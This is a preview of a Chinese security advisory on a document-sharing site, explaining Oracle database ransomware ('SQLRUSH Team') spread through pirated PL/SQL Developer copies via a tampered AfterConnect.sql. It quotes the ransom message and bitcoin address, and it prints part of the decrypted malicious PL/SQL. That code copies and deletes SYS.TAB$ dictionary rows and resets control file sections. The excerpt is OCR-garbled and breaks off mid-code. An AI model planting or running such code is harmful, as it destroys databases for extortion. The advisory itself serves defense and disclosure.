返回
关于近期Oracle安全比特币勒索问题揭秘和防范

关于近期Oracle安全比特币勒索问题揭秘和防范

ID:43932141

大小:49.50 KB

页数:9页

时间:2019-10-17

关于近期Oracle安全比特币勒索问题揭秘和防范_第1页
关于近期Oracle安全比特币勒索问题揭秘和防范_第2页
关于近期Oracle安全比特币勒索问题揭秘和防范_第3页
关于近期Oracle安全比特币勒索问题揭秘和防范_第4页
关于近期Oracle安全比特币勒索问题揭秘和防范_第5页
资源描述:

《关于近期Oracle安全比特币勒索问题揭秘和防范》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、关于近期Oracle安全比特币勒索问题揭秘和防范目录前2二、问题原因:2三、安全漏洞:5四、处置建议:5五、处理方法:65.1.医院自查:5.2、中联服务6六、建议6亠厶■亠.刖B近期,国内很多用户的Oracle数据库,突然遭遇到莫名其妙的攻击事件,大家种种猜测、揣摩、重试,引发了一次小小的数据恐慌。在注意到这类安全事件之后,我们第一时间投入分析、采集,最后找出了问题的根源,昨天已经发出了全面的预警和警示,今天再次详述该类问题,与Oracle的用户们共为警醒。最近问题的主要原因是某些用户下载了来源不明的数据库管理工具,导致数据库被感染。我们强烈推荐大家提高版权意识,购

2、买正版软件,远离风险,从规范做起。一、问题症状:很多用户在录数据库时发现该问题,数据库应用弹出“锁死“提示,并且威胁说需要向黑客发送5个比特币方可获得解锁。在客户端,你可能获得类似的提示信息:在数据库受攻击之后,在数据库的告警日志中,可能充斥如下信息:ORA・00604:erroroccurredatrecursiveSQLlevel1ORA-20315:你的数据库已被SQLRUSHTeam锁死发送5个比特币到这个地址166xklFXMB2g8JxBVF5T4AwlZ5aZ6vSE(大小写一致)之后把你的OracleSID邮寄地址我们将让你知道如何解锁你的数据库Hib

3、uddy,yourdatabasewashackedbySQLRUSHTeam,send5bitcointoaddress166xklFXMB2g8JxBVF5T4AwlZ5aZ6vSE(casesensitive),afterthatsendyourOracleSIDtomailORA-06512:at"XXX・DBMS_CORE_INTERNAL",line27ORA-06512:atline2这里无非是一些警示和勒索,但是这儿SQLRUSHTeam,引发了大家的猜测,sqlrush@mail.com,这个地址和id引发了对于始作俑者的猜测,当然事实不得而知。二、

4、问题原因:我们通过有限的案例,详细分析了问题的原因和感染过程,在此披露出来,给Oracle的用户们作为参考。注意:当一个问题研究清楚之后,就不再会产生恐惧,恐惧来自于未知,在没有遭到原因之前,大家的各种猜测导致问题扩大化,现在可以回到问题的本质上来了。问题的根本原因是:如果用户从互联网上下载了盗版的PL/SQLDeveloper工具后(尤其是各种绿色版、破解版),就可能因为这个工具中招。所以这个问题和Oracle本身关系不大,也没有注入那么复杂。而是随着你使用这个工具,用户的权限就自然被附体的进行了入侵。重要的问题要说三遍:盗版软件害人!PL/SQLDeveloper

5、在中国的流行程度和盗版程度毋庸置疑。这个软件的安装目录存在一个脚本文件AfterConnect.sql,这个脚本就是真正的问题所在。正版软件安装,这个脚本文件是空文件,但是被注入的文件包含了一系列的JOB定义、存储过程和触发器定义,就是祸患的源头。受感染文件・AfterConnect.sql开头是这样的,伪装成一个login.sql的脚本内容,有清晰的注释代码:实质内容,以加密方式展示,用户看不到内容,但是可以通过unwrap进行解密(但是注意那些解密程序不要存在恶意代码):无疑,黑客是非常了解Oracle数据库的,其脚本代码的核心部分,解密后如下(做了删节,不要害人

6、人BEGINSELECTNVLCTO_CHAR(SYSDATE・CREATED),0)INTODATE1FROMV$DATABASE;IF(DATE1>二1200)THENEXECUTEIMMEDIATE'createtableORACHK'

7、

8、SUBSTR(SYS_GUIDJO)

9、

10、'tablespacesystemasselect*fromsys.tab$';DELETESYS.TAB$WHEREDATAOBJ#IN(SELECTDATAOBJ#FROMSYS.OBJ$WHEREOWNER#NOTIN(0,38));COMMI

11、T;EXECUTEIMMEDIATE'altersystemcheckpoint';SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);FORIIN1..2046LOOPDBMS_SYSTEM.KSDWRT(2,'Hibuddy,yourdatabasewashackedbySQLRUSHTeam,send5bitcointoaddress166xklFXMB2g8JxBVF5T4AwlZ5aZ6vSE(casesensitive),afterthatsendyourOracleSIDt

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。